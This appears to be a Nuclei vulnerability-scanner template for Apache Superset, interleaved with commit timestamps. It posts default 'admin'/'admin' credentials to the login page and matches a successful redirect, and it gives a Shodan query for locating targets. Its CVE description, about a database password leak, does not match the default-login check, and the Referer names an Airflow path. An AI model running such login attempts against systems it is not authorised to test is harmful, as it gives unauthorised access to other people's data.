2022-03-02 16:54:14 +00:00
id : CVE-2021-44451
2021-07-21 05:21:27 +00:00
info :
2021-09-22 10:37:07 +00:00
name : Apache Superset Default Login
2021-07-21 05:21:27 +00:00
author : dhiyaneshDK
severity : high
2022-03-02 16:54:14 +00:00
description : Apache Superset up to and including 1.3.2 allowed for registered database connections password leak for authenticated users. This information could be accessed in a non-trivial way.
reference :
- https://github.com/detectify/ugly-duckling/blob/master/modules/crowdsourced/apache-superset-default-credentials.json
- https://nvd.nist.gov/vuln/detail/CVE-2021-44451
classification :
cve-id : CVE-2021-44451
2022-04-22 10:38:41 +00:00
remediation : Users should upgrade to Apache Superset 1.4.0 or higher.
2022-05-12 14:18:36 +00:00
metadata :
verified : true
shodan-query : title:"Superset"
2022-04-22 16:43:51 +00:00
tags : cve,cve2021,apache,superset,default-login
2021-07-21 05:21:27 +00:00
requests :
2021-07-23 21:19:55 +00:00
- raw :
- |
GET /login/ HTTP/1.1
Host : {{Hostname}}
Origin : {{BaseURL}}
2021-07-23 19:33:06 +00:00
2021-07-23 21:19:55 +00:00
- |
POST /login/ HTTP/1.1
Host : {{Hostname}}
Origin : {{BaseURL}}
Content-Type : application/x-www-form-urlencoded
Referer : {{BaseURL}}/admin/airflow/login
2021-10-10 01:40:47 +00:00
csrf_token={{csrf_token}}&username={{username}}&password={{password}}
2021-10-08 16:42:54 +00:00
2021-10-10 01:40:47 +00:00
attack : pitchfork
2021-10-08 16:42:54 +00:00
payloads :
username :
- admin
password :
- admin
2021-07-23 21:19:55 +00:00
extractors :
- type : regex
2021-10-10 01:40:47 +00:00
name : csrf_token
2021-07-23 21:19:55 +00:00
group : 1
part : body
internal : true
regex :
- 'value="(.*?)">'
2021-07-21 05:21:27 +00:00
matchers-condition : and
matchers :
- type : word
2021-07-23 21:19:55 +00:00
part : body
condition : and
2021-07-21 05:21:27 +00:00
words :
2021-07-23 19:33:06 +00:00
- '<title>Redirecting...</title>'
- '<h1>Redirecting...</h1'
- '<a href="/">'
2021-07-23 21:19:55 +00:00
- type : word
part : header
words :
- 'session'
2021-07-21 05:21:27 +00:00
- type : status
status :
2021-07-23 19:33:06 +00:00
- 302
2022-03-02 16:54:14 +00:00
# Enhanced by mp on 2022/03/02